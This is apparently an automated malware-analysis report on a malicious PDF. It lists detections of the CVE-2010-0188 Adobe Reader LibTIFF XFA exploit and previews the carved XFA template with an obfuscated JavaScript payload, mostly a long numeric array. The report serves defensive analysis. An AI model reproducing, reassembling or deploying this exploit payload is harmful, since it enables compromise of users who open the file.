MALICIOUS
182
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 6
-
Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 critical CVE likely CVE_2010_0188PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
-
ClamAV: Pdf.Exploit.Agent-6136306-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Exploit.Agent-6136306-0
-
Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTHA PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
-
XFA form low PDF_XFAPDF uses XML Forms Architecture — can contain script logic
-
Embedded script payload in PDF stream info PDF_EMBEDDED_SCRIPT_PAYLOADPDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.xfa.org/schema/xfa-template/2.5/ In PDF document text
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
embedded_pdf_script_00000346.bin |
pdf-embedded-script | PDF raw stream script payload at offset 0x346 | 103631 bytes |
SHA-256: cb795dbdbf17b489f18aa3a0df2ff672c64dbfe4977edf343b6d42074bf15ceb |
|||
Preview scriptFirst 1,000 lines of the extracted script
<test:xdp xmlns:test="http://ns.adobe.com/xdp/"> <asd/>as<config xmlns='123'><asd/> <test:present> <pdf > <test:interactive>1</test:interactive> <int>0</int> a <asd/>a<test:version>1.5</test:version> a<asd/> </pdf> </test:present> <asd/></config><asd/> <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'> <asd/> a<subform name="a1"> <pageSet> <pageArea id="roteYom" name="roteYom"> <contentArea h="512pt" w="214pt" x="0.25in" y="0.25in"/> <medium long="792pt" short="612pt" stock="default"/> </pageArea> </pageSet> <asd/>a <subform name='asdvsa'> a<asd/>a<field name='qwe123b'><event activity='initialize'> <script contentTyp='application' contentType='application/x-javascript'> 
function test3(){if(s)v=ar[z];s=s+cc[v+4];}
ar=[-4, -3,
-2,
-1, 0,
-3,
1,
1,
2,
3,
4,
5, -4, -3,
-2,
-1,
6,
6,
6,
7,
-1,
8,
8,
8,
7,
-1, 1,
1,
1,
7, -1,
9,
9,
9,
7,
-1,
10,
10, 10, 7,
-1,
4,
4,
4,
7,
-1,
11, 11, 11,
5,
-4,
-3,
-2, -1, 0,
12,
2,
3,
13, 9,
-2, 14,
15,
-3,
7,
-1,
2,
5,
-4,
-3,
-2,
-1,
16,
-1,
17,
-1,
3,
9,
18, -1,
19,
-2,
-2, -3,
20, 21,
22,
5,
-4,
-3,
-2,
-1,
20,
-1,
17,
-1,
3,
9,
18,
-1,
19,
-2,
-2,
-3,
20,
21,
22,
5,
-4, -3,
-2,
-1, 15,
23,
24,
17,
25,
26,
8,
27,
28,
29,
28,
28, 10, 28,
30, 24,
31, 32,
28,
26,
-3,
33,
8,
27,
28,
29, 28,
28,
10, 28,
10,
29,
33, 32,
28,
26,
-3,
-3,
33,
9,
6,
32,
28,
26,
-3,
33,
28,
27,
28, 32,
27,
26,
-3,
29,
9,
27,
10,
32,
28,
26,
-3,
26, 24,
26, 24,
26,
24,
26,
24,
27,
29,
28,
28,
28,
28,
28,
28,
28, 28,
28,
28,
28,
28,
28,
28,
28,
28,
28,
28, 28,
28,
28,
28,
28,
28,
28,
28,
28,
28,
28, 28,
24,
27, 33,
34,
32,
28,
26, -3, 29,
26, 27,
28,
29,
28,
28,
10, 28,
28,
28,
26,
28, 28,
28,
28,
26,
24,
26, 24, 26,
24,
26,
24,
26,
24, 26,
24,
26,
24,
26,
24,
29,
29,
32, 33,
9, 26,
10,
8,
10,
8,
32,
30,
9, 26, 31,
30,
33,
26,
9,
34, 30, 10,
33,
33,
8,
28,
29,
26,
32,
6,
26,
28,
33, 28,
32, 6,
26,
28,
28,
8,
32,
6,
31, 28,
24,
8,
30,
29,
32,
6,
31, 29,
28,
32, 33,
33,
1, 6, 29,
29, 32, 6,
30,
9, 33,
8,
28,
33, 31,
26,
33, 33,
27, 8,
32,
24,
9, 9,
24,
30,
24,
28,
10,
10,
10,
10,
6,
32,
32,
6,
26, 28, 33, 28,
8,
33,
26,
29,
33,
34,
28,
29, 31, 30, 10,
6, 32, 31,
33,
26, 27,
26,
32, 30,
9, 26,
31,
30,
30,
24, 9,
34,
9,
6,
26,
8,
30,
24, 30,
29,
32,
6,
31,
30,
33,
8,
32,
6,
31,
26,
33,
30, 31,
32,
28,
33,
10,
30,
30, 29, 32,
6,
31,
29,
27,
28,
28,
33,
10,
30,
33,
33, 8,
34,
26,
34,
26,
24, 10,
8,
-3,
1,
28,
33,
8,
30,
33, 33, 1,
6,
28,
10,
6,
9,
24,
28, 33,
32,
10,
27,
31, 26,
28, 32,
8,
24,
8,
6,
28,
1, 28,
33, 1,
-3,
26, 28,
9,
6,
10,
24, 33,
6,
24,
10,
31,
30,
9,
29, 30, 9,
32,
6,
30,
9,
27,
26,
28,
33, 1,
1,
29, 29,
32,
6, 28,
8, 26, 6, 32,
1, 26, 29,
9,
8,
10,
10, 30,
26,
27,
26,
28,
8,
32,
6, 1,
32,
28,
33,
1,
1,
32, 6,
28,
26,
32, 6,
28, 33,
8,
30,
-3,
6,
30,
9,
30,
34, 8,
33,
9,
6,
30,
33,
-3,
1,
32,
6,
29,
32, 27,
28,
32,
28,
31,
1,
28,
8, 33, 33, 31,
26,
28,
33, 34,
29, 9,
6,
10,
33,
32,
6, 29,
32,
28,
32,
32, 6,
10,
31,
29, -3, 28,
30,
30,
34,
9,
32,
34,
32,
10, 10,
10,
10,
10,
10,
9, 27,
10,
34,
9, 32,
28,
28,
28, 28,
28,
28,
28, 28, 30,
32, 30,
28, 29,
-3, 26,
28,
29, 32,
10,
10,
28,
28, 28,
28,
28,
28,
30, 28, 32,
33, 8,
28, 24,
34, 30,
28,
30, 30,
32, 6,
9, 8,
32, 6,
30,
9,
24,
28, 32,
33, 8,
33, 28,
30,
10,
10,
9,
33,
29,
32,
29,
10,
29, 9,
28,
28,
28, 28,
29,
32, 31,
30,
31, 27, 29,
8,
29,
1,
30, 26,
10,
10, 24, 29,
32,
33,
8,
26,
28,
32, 32,
6, 9,
32, 9,
32, 29,
24,
10,
10, 10,
10,
10,
10,
9,
6, 28,
27,
9,
6,
31,
27,
32, 24,
9,
8,
28,
26, 28,
24, 28, 28,
28,
28,
32, 1, 30,
8,
27, 26,
28,
8,
8, 31,
28,
26,
27,
26,
31, 27, 29,
30, 29, 31,
31,
33,
8,
31, 26,
26,
27,
26,
28,
26,
31,
29,
31,
27, 33,
33,
33, 27,
8,
31, 26,
26,
27,
26,
28,
32,
27,
28,
27,
1,
31,
33,
27, 28,
30,
33,
29,
32,
10,
32,
28,
28,
28,
28,
28,
28,
10,
10, 30,
29, 28, 8,
32,
6,
9,
32, 33,
33, 8,
34,
30,
24,
8,
31,
26,
26,
24,
1,
28,
28,
31, 31,
31,
28,
29,
27,
31,
26,
8,
31, 26,
26,
24,
1,
28,
30, 27,
9, 29,
26,
29,
8,
29,
8,
8, 29,
26,
26,
24,
1,
28,
34,
28, 28, 30,
34,
32,
-3,
8, 24,
28,
26,
33,
28,
32,
32, 26,
26,
24,
1,
28,
26,
26,
24,
30,
24,
29,
-3,
28,
28, 29,
-3,
28,
28,
30,
33,
30,
31,
29,
-3, 28,
28,
10, 10,
30,
29, 24,
26,
32,
30,
8,
28,
31,
30,
24, 29, 29,
-3,
28,
28,
30,
33,
10,
10,
30, 29,
28,
26,
29,
-3,
28,
28,
32,
33, 9,
6, 28, 8,
30,
33,
10, 10,
30,
29,
28,
26,
32,
33,
8, 33,
28,
8,
9,
6,
28,
27,
9,
6,
24,
33,
26,
31, 32,
28,
33,
10, 28,
28,
31, 30,
10,
-3,
26,
31,
32,
28,
33, 10,
28,
28,
31, 30,
8,
26,
29,
-3, 28,
28,
29,
-3,
10,
9,
10, 10,
30, 29,
28,
32,
9, 32,
34,
8,
10,
9,
10,
10, 10,
10,
32, 9,
26,
9, 28,
9,
9,
8,
34,
32, 10,
9,
32,
-3,
28, 9,
32,
34,
29,
10,
28,
24,
6,
1,
33,
33, 8,
-3,
32, -3,
30,
6, 24,
6,
8,
29,
26, 29,
31,
34,
33, 29,
24,
-3, 27,
10, 31,
28,
29, 32,
31,
26,
31,
26,
31, 28,
33, -3,
27, 10,
27,
10,
33,
24,
33,
26,
33, 29,
27,
9,
33,
24,
33,
32,
33,
30,
27,
9,
33,
27,
33, 26,
33,
26,
27, 9, 33,
24,
33, 26,
27,
10,
31,
31,
27, 9,
31,
28,
29,
32,
31,
28,
33,
10, 29,
29,
33, 1,
33,
27, 33,
29,
33,
31,
27,
10, 27,
29,
29,
30,
33,
1,
33, 26,
28, 28, 28,
28,
25,
5, -4,
-3, -2, -1,
15,
23, 27,
17,
25,
26, 8, 27,
28,
29, 28,
28,
10,
-3,
30,
29,
33, 32,
28,
26,
-3,
33,
8,
27, 28,
29,
28,
28,
10,
34,
29,
27,
24,
32,
28,
26,
-3,
34,
28,
24,
10,
32,
28,
26,
-3,
33,
28, 34,
28,
32,
26,
26,
-3,
31,
1,
31,
9, 32,
28,
26,
-3,
26,
24,
26,
24,
26, 24,
26,
24,
27,
29,
28,
28,
28,
28,
28,
28,
28, 28,
28,
28,
28,
28, 28, 28, 28,
28, 28,
28,
28,
28,
28, 28, 28,
28,
28, 28,
28,
28,
28,
28,
31, 24,
32,
32, 32,
28, 26, -3,
29,
26,
27,
28,
29,
28, 28,
10,
28,
28,
28,
26, 28,
28,
28,
28, 26,
24,
26,
24,
26,
24,
26,
24, 26,
24,
26,
24,
26, 24,
26,
24, 29,
29,
32,
33,
9, 26, 10,
8, 10,
8,
32, 30, 9,
26,
31,
30, 33, 26,
9, 34,
30,
10,
33,
33,
8,
28,
29,
26, 32,
6,
26,
28,
33,
28, 32, 6,
26, 28,
28,
8,
32,
6,
31,
28,
24, 8,
30,
29, 32,
6,
31,
29,
28,
32,
33,
33, 1,
6,
29,
29,
32,
6, 30,
9,
33,
8, 28,
33,
31,
26,
33, 33,
27,
8,
32, 24,
9,
9,
24,
30,
24,
28,
10,
10,
10,
10,
6, 32,
32,
6,
26,
28,
33,
28,
8,
33,
26,
29,
33,
34,
28,
29,
31,
30, 10,
6,
32,
31,
33, 26,
27, 26,
32,
30,
9,
26,
31,
30,
30,
24,
9, 34,
9, 6,
26,
8,
30,
24,
30,
29,
32,
6,
31,
30,
33,
8, 32, 6,
31,
26,
33, 30,
31,
32,
28, 33,
10,
30,
30,
29,
32, 6,
31,
29,
27,
28,
28,
33, 10, 30, 33,
33,
8, 34, 26,
34, 26,
24,
10, 8,
-3, 1,
28, 33,
8,
30,
33,
33, 1,
6,
28,
10,
6,
9,
24, 28,
33,
32, 10,
27,
31, 26,
28, 32, 8,
24,
8,
6,
28,
1,
28,
33, 1, -3,
26, 28,
9,
6,
10,
24,
33,
6, 24,
10, 31,
30,
9,
29,
30,
9,
32,
6,
30, 9, 27,
26, 28,
33,
1,
1,
29,
29,
32,
6,
28, 8,
26,
6,
32,
1,
26,
29,
9, 8,
10,
10, 30,
26,
27,
26,
28,
8,
32,
6, 1, 32,
28,
33,
1,
1,
32,
6,
28,
26,
32,
6,
28,
33,
8,
30,
-3,
6,
30, 9, 30,
34,
8,
33,
9,
6,
30,
33, -3,
1,
32,
6,
29,
32, 27,
28, 32,
28,
31, 1,
28,
8,
33,
33, 31, 26,
28, 33,
34, 29,
9,
6,
10,
33, 32, 6,
29,
32,
28,
32,
32,
6,
10, 31,
29,
-3,
28,
30,
30,
34,
9,
32,
34, 32,
10,
10, 10, 10,
10, 10,
9,
27,
10,
34,
9,
32,
28,
28,
28, 28,
28,
28,
28,
28, 30,
32, 30,
28,
29,
-3,
26,
28,
29,
32,
10,
10,
28,
28,
28,
28,
28,
28,
30, 28, 32, 33,
8,
28,
24, 34,
30,
28,
30,
30, 32,
6,
9, 8,
32,
6,
30, 9,
24,
28,
32,
33,
8,
33, 28,
30,
10, 10,
9,
33, 29,
32,
29,
10, 29,
9,
28,
28,
28, 28,
29,
32, 31,
30,
31,
27,
29,
8,
29,
1,
30,
26,
10,
10,
24,
29,
32, 33,
8,
26, 28,
32,
32,
6,
9,
32,
9,
32,
29, 24,
10,
10,
10,
10,
10,
10,
9,
6,
28,
27,
9,
6,
31, 27,
32,
24,
9, 8,
28,
26,
28,
24,
28, 28,
28,
28,
32, 1,
30,
8,
27,
26,
28,
8,
8,
31,
28,
26,
27,
26,
31,
27,
29, 30, 29,
31,
31,
33, 8,
31,
26,
26, 27,
26,
28,
26,
31,
29,
31,
27, 33,
33, 33,
27, 8, 31,
26,
26, 27,
26,
28,
32,
27,
28,
27,
1, 31,
33,
27,
28,
30,
33,
29,
32,
10,
32,
28,
28,
28,
28,
28,
28, 10, 10,
30,
29,
28,
8,
32, 6,
9, 32,
33,
33, 8,
34, 30,
24, 8,
31,
26, 26, 24, 1,
28,
28,
31,
31, 31,
28,
29, 27,
31,
26, 8,
31,
26,
26,
24,
1,
28,
30, 27, 9,
29,
26, 29,
8,
29,
8,
8,
29,
26,
26,
24,
1,
28, 34, 28, 28,
30, 34, 32,
-3, 8,
24,
28,
26, 33,
28, 32,
32,
26,
26, 24,
1,
28,
26,
26,
24,
30,
24,
29,
-3,
28, 28,
29,
-3,
28,
28,
30,
33,
30, 31,
29, -3,
28,
28,
10, 10,
30,
29,
24,
26,
32, 30,
8,
28,
31,
30,
24,
29,
29, -3,
28,
28,
30,
33,
10, 10,
30,
29,
28, 26, 29,
-3,
28,
28, 32,
33,
9,
6,
28,
8, 30,
33, 10,
10,
30,
29,
28, 26, 32,
33,
8, 33,
28,
8, 9,
6,
28,
27,
9, 6,
24,
33,
26,
31, 32, 28,
33, 10,
28,
28, 31,
30,
10,
-3,
26,
31,
32,
28,
33, 10, 28,
28, 31,
30,
8,
26,
29,
-3,
28,
28, 29, -3, 10,
9, 10, 10,
30, 29,
28, 32, 9, 32,
34,
8,
10,
9,
10, 10,
10, 10,
32, 9, 26,
9,
28, 9,
9, 8,
34, 32,
10,
9,
32,
-3,
28, 9,
32,
34,
29, 10,
28, 24, 6,
1,
33, 33,
8,
-3,
32,
-3,
30,
6,
24,
6,
8,
29,
26,
29,
31,
34,
33,
29, 24,
-3,
27,
10,
31,
28,
29,
32,
31,
26, 31,
26, 31,
28, 33, -3,
27,
10, 27,
10,
33,
24, 33,
26,
33,
29,
27,
9,
33,
24,
33,
32, 33,
30,
27,
9,
33,
27,
33,
26,
33, 26,
27,
9, 33,
24,
33,
26,
27,
10, 31,
31,
27,
9,
31, 28,
29,
32,
31, 28, 33,
10,
29,
29,
33,
1,
33,
27,
33, 29,
33,
31,
27, 10,
27, 29,
29,
30,
33,
1,
33,
26,
28,
28, 28,
28,
25,
5,
15, 23,
33,
17,
-3,
0,
0, 5, 15,
23,
26,
17,
3,
9,
18,
-1,
19,
-2,
-2,
-3,
20,
21,
22, 5,
10,
35,
3,
8,
13,
2, 12,
3,
-1,
15,
23,
30,
21, 22,
36,
-4,
-3,
-2, -1,
15,
23,
29,
17,
15,
23,
33,
37,
-4,
2, 9,
18,
9,
-2,
38,
9,
-2,
14,
2,
12, 3, 37,
13, 12, 39, 13,
-2,
2,
3,
4,
21,
22,
5,
15,
23,
29,
17,
15,
23,
29,
37,
-2,
9,
0,
23, -3,
8,
9,
21,
40,
37,
40,
7,
40,
40,
22, 5,
18,
11,
2,
23,
9,
21,
15, 23,
29,
37,
23,
9,
3,
4, 13,
11,
41,
26,
22,
15,
23,
29,
42,
17, 40,
28,
40,
5,
-2,
9,
13,
35,
-2,
3, -1,
0,
-3,
-2,
14,
9,
43,
3, 13,
21, 15,
23,
29,
7,
24,
28,
22,
44,
10, 35,
3,
8, 13, 2,
12,
3,
-1,
15,
23,
31, 21,
15,
23,
32, 7,
15,
23,
34,
22,
36,
18,
11,
2,
23,
9,
21,
15,
23,
32, 37,
23,
9, 3,
4,
13,
11,
45,
27,
41,
15,
23, 34,
22,
15,
23,
32,
42,
17, 15,
23,
32,
5, -2,
9,
13, 35,
-2,
3,
-1,
15,
23,
32, 37,
14,
35,
6,
14, 13, -2,
2,
3,
4,
21,
28,
7,
15,
23, 34,
46,
27, 22,
44,
10,
35, 3,
8,
13,
2,
12,
3,
-1,
15, 43, 28,
21,
15,
43, 24,
22,
36,
15,
43,
24,
17, 35,
3,
9,
14,
8,
-3,
0,
9,
21,
15,
43,
24,
22,
5, -2,
12,
13,
9,
47,
-3,
48,
17,
15,
43, 24,
37,
23,
9,
3,
4,
13,
11,
45,
27,
5,
1,
-3,
48, ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.